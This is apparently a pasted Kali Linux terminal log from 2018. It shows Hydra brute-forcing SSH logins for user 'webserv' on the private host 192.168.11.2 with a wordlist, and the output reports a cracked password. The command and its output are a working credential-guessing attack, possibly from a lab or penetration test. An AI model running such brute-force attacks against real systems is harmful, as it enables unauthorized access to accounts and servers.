· 7 years ago · Aug 05, 2018, 05:02 PM
1root@kali01:~/.sqlmap/output/192.168.11.2# hydra -l webserv -P password.lst ssh://192.168.11.2
2Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3
4Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-05 19:56:49
5[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
6[DATA] max 16 tasks per 1 server, overall 16 tasks, 3552 login tries (l:1/p:3552), ~222 tries per task
7[DATA] attacking ssh://192.168.11.2:22/
8[22][ssh] host: 192.168.11.2 login: webserv password: webserv
91 of 1 target successfully completed, 1 valid password found
10[WARNING] Writing restore file because 1 final worker threads did not complete until end.
11[ERROR] 1 target did not resolve or could not be connected
12[ERROR] 16 targets did not complete
13Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-05 19:57:13